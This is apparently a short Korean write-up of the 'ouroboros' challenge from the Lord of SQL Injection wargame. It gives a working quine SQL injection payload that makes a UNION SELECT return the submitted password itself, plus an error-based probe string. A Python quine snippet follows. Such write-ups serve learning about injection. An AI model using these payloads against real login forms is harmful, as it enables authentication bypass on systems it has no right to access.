ouroboros(quine sql injection)

id도 없고.. 그냥 pw 하나 뿐인 당황스러운 문제...

 

?pw=' or if(length(pw)=0, 9e307*2, 0)%23 로도 에러 창을 확인했지만 에러창이 따로 뜨지 않았다.

---

중요한 걸 간과했다.

컬럼이 하나밖에 없는데 데이터가 하나도 출력 안 된 것을 알 수 있다.

즉, 디비에 데이터가 없다. 

 

 

그렇다면 $_result[pw]와 $_GET[pw]가 같기만 하면 된다.

---

Quine SQL injection

Quine은 소스코드를 그대로 출력하는 프로그램이다.

 

 

 

pw=a' union SELECT REPLACE(REPLACE('a" union SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine#',CHAR(34),CHAR(39)),CHAR(36),'a" union SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine#') AS Quine#

 

 

---

https://go-madhat.github.io/ouroboros-writeup/

[Lord of SQL Injection] LoS - ouroboros 문제풀이

---

python quine code

s = 's = %r\nprint(s%%s)'
print(s%s)